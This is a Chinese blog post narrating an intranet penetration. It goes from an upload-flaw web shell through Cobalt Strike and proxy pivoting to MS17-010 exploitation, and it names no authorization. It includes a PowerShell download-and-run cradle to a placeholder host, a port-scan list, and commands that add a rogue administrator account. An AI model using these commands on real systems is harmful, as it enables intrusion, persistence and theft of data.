渗透测试步骤和方法 安全渗透淦熬夜写完一次二层内网渗透

很久没有写点东西了，这次分享个二层内网的渗透过程，该内网约150台设备，工作组环境。

目录：

• 01外部打点
• 02边界突破
• 03内网渗透-信息收集
• 04内网渗透-拿下资产

01外部打点

入口点起源于弱口令 上传漏洞

当拿到上传漏洞之后，常规渗透途径 小马 -> 大马 -> 提权，条件允许的话个人更喜好大马，故直接上传了大马。

02边界突破

有了大马后，首先要做的为信息收集，信息收集大家都知道，渗透测试的关键都在于信息收集。

首先查看权限，为Administrator，其实也不用看，该网站为Tomcat，JSP网站，渗透多了基本知道网站权限为Administrator；

其次查看网卡，发现为双网卡服务器，故可把该台主机当作跳板机；

查看任务进程，查看任务进程的目的为判断服务器上是否存在杀毒软件，来进行下一步的渗透步骤，该台服务器由下图可以看出，无杀毒软件；

查看网络连接，判断服务器开放端口以及相应服务。

信息只做浅谈，相应要做的信息收集肯定不止如上那些，收集了如上信息后，由于服务器无杀毒软件，故可直接CS上线，这里采用powershell上线方式，命令为：powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxx/a'))"

可直接上线；

03内网渗透-信息收集

由之前的信息收集可得，已拿下的A主机为双网卡，故可做跳板机，那么可以通过它，扩大这次渗透的战果。

首先，收集内网存活主机，这里采用了K8的CS脚本Ladon，可收集内网存活主机，Target输入192.168.0.1/16可扫描B段；

存活主机扫描完毕，149台主机内网存活，扫描了主机之后，下一步就是扫端口，用的为CS自带的端口扫描模块，Ports输入自定义端口21-23,110,139,143,389,512-514,873,1080,1352,1433,1521,2049,2181,3306,3389,4848,5000,5432,5900,6379,7001,80-90,443,8000-9000,9090,9200,9300,11211,27017

CS自带的端口扫描模块截图：

对扫描结果进行筛选，这里筛选结果如下：

04内网渗透-拿下资产

在内网渗透之前，需要说下代理隧道，在这篇文章用得到的隧道为两种，分别为：基于Windows平台：reGeorg Proxifier基于Kali平台：reGeorg Proxychains

基于Windows平台：reGeorg ProxifierreGeory为设置代理，命令如下：

Proxifier为让本地流量过代理，需设置监听本地，且放过Python（即让Python流量不过代理），配置如下：

基于Kali平台：reGeorg Proxychains跟Windows平台相同的为都用reGeorg做代理，因为reGeorg基于Python，Python在Windows上和Linux上都可安装运行，与Windows平台不同的是，Kali平台导入代理流量的工具是Proxychains，首先需在Proxychains.conf做配置，再在使用工具前加proxychains即可。

Proxychains配置如下，这里设置的为本地1080端口走代理：

MSF走代理命令为：

有人可能会问，CS已经上线，为什么不用CS代理呢，MSF干嘛不用MSF代理呢？答：CS与MSF毕竟为渗透工具，代理模块用起来可以用，但都有各自的缺点，MSF不稳定，CS则速度慢，所以还是设置个其他代理渗透更顺手，这里reGeorg也可换成其他代理。

说了代理，之后就要聊聊如何进行内网渗透了，由内网信息收集，我们可获得大量内网主机端口信息，对这些信息进行分析，可分为如下三种类型进行渗透：Web应用（80、443、8080端口等）；数据库、主机应用（1433的MSSQL、3306的MYSQL、Windows的rdp、Linux的SSH等）；常规内网漏洞（MS17_010、0708等）。

Web应用内网常用，SQL注入、命令执行（shiro，struct2等）、弱口令等。拿下的Web应用部分截图如下：某后台管理系统：

某存储管理系统：

某设备管理系统：

数据库、主机应用主要问题为弱口令，可通过超级弱口令检测工具、Hscan、Hydra等进行弱口令检测工具进行爆破。Tips：爆破的主要诀窍在于字典。

超级弱口令检测工具如下：

Hscan如下：

常规内网漏洞之前的代理已经说了Proxychains msfconsole，该命令即为让MSF流量过代理，即在内网环境中。那么在内网环境中可使用MSF的ms170_10、0708等模块去进行相应渗透，msf为内网渗透神器，其内置大量渗透攻击模块，使用方式为 ：查询模块（Search） -> 选择模块（use） -> 查看使用方法（show options） -> 配置参数（set） -> 运行（run）；

在这就通过ms17_010打下了内网网站主服务器，多网站备份以及上万条资料都在其中。下面说下ms17_010打下该服务器的过程。

首先，刚才筛选出一份445端口存在的存活主机表，然后对这份存活主机表进行ms17_010扫描，发现某服务器存在ms17_010，发现存在后，尝试上线，可通过CS监听，MSF派生CS上线或者直接CS上线，发现无法上线，故用ms17_010command模块查看系统任务，估计存在杀毒软件，tasklist命令执行后，发现的确如此，

ZhuDongFangYu，很熟悉的程序，说明该台服务器存在360，那么未免杀的木马则无法在该台服务器中运行，这里通过添加管理员账号 远程rdp连接的方式绕过该防护set command net user administrator1 administrator1 /addset command net localgroup administrators administrator1 /add

执行后net user查看，发现administrator1已添加，那么接下来可直接连接3389端口的rdp了，已拿下该服务器，经过后期登录查看，发现多网站备份以及上万条资料都在其中。

写文章时发现有用户登录，不做登陆操作演示了。

总结：

看到这里的大佬，动动你们发财的小手三连一波~

我是一名渗透测试工程师，为了感谢读者们，我想把我收藏的一些干货贡献给大家，回馈每一个读者，希望能帮到你们。

• 网络安全面试题（干货多多!!）
• SRC技术文档
• 渗透测试推荐书单
• 工具包

关注我：私信回复“资料”获取网络安全资料、源码、笔记、视频、工具包，感谢您的关注和阅读！！

喜欢本文的小伙伴记得点赞 收藏哟~

,